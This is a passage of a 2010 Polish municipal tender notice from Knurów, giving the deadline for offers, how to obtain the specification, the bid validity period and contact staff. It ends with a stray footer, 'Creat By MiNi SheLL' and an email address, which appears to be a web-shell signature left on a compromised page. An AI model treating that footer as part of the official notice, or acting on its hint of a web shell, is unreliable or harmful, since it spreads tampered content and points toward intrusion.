<p>Zamawiający dopuszcza zmianę istotnych postanowień umowy zawartej w wyniku niniejszego postępowania w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadkach wskazanych w projekcie umowy stanowiącym załącznik do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.knurow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek wykonawcy w siedzibie zamawiającego - Wydział Zamówień Publicznych, pok. 217, w godz. pracy Urzędu lub za zaliczeniem pocztowym po uiszczeniu opłaty na konto zamawiającego. Opłata 34,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2010 godzina 10:00, miejsce: Urząd Miasta Knurów, ul. dr. F. Ogana 5, 44-190 Knurów, Wydział Zamówień Publicznych, pok. 217.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z wykonawcami są: 
Naczelnik Wydziału Zamówień Publicznych - Grażyna Szweda, tel. 32 339-23-08, 
Inspektor Wydziału Zamówień Publicznych - Urszula Czarnecka, tel. 32 339-23-09. 
Fax 32 339-22-92, e-mail zp@knurow.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com